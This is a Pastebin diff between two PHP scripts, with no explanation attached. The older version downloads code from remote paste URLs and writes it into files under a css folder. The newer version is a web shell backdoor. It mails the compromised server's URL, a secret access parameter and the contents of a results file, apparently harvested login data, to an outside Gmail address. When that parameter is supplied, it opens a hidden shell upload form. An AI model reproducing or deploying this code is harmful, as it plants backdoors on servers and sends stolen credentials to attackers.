View difference between Paste ID: bjn1Dd2M and iDQuX0wq
SHOW: | | - or go back to the newest paste.
1-
<?
1+
<?php
2
set_time_limit(0);
3
error_reporting(0);
4-
$chh="http://pastebin.com/raw/7ejUphZB"; $scann=file_get_contents($chh); 
4+
$ss = $_SERVER['REMOTE_ADDR'];
5-
$chh="http://pastebin.com/raw/4hp0i2tT"; $scan=file_get_contents($chh); 
5+
$to .= 'havij.exe@gmail.com';
6-
$zz=fopen('css/function.js','w');fwrite($zz,$scann);fclose($zz); 
6+
$subject = 'PPL LOGIN FROM | '.$ss.'';
7-
$z=fopen('css/white.js','w');fwrite($z,$scan);fclose($z); ?>
7+
$message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?wlad=l9hab"."\r\n
8
\n"."_________________________________". file_get_contents("resulte.txt") . "\n";
9
$headers  = 'MIME-Version: 1.0' . "\r\n";
10
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
11
$headers .= 'From: Dexter <localhost>' . "\r\n";
12
mail($to, $subject, $message, $headers);
13
 
14
$nemo  = $_GET['wlad'];
15
if($nemo == 'l9hab'){
16
$nemoshell = $_FILES['file']['name'];
17
$nemohero  = $_FILES['file']['tmp_name'];
18
echo "<form method='POST' enctype='multipart/form-data'>
19
       <input type='file'name='file' />
20
       <input type='submit' value='upload shell' />
21
</form>";
22
move_uploaded_file($nemohero,$nemoshell);
23
}
24
 
25
 
26
?>